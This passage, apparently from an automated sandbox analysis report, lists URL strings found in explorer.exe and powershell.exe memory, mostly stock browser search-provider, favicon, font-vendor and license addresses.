Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
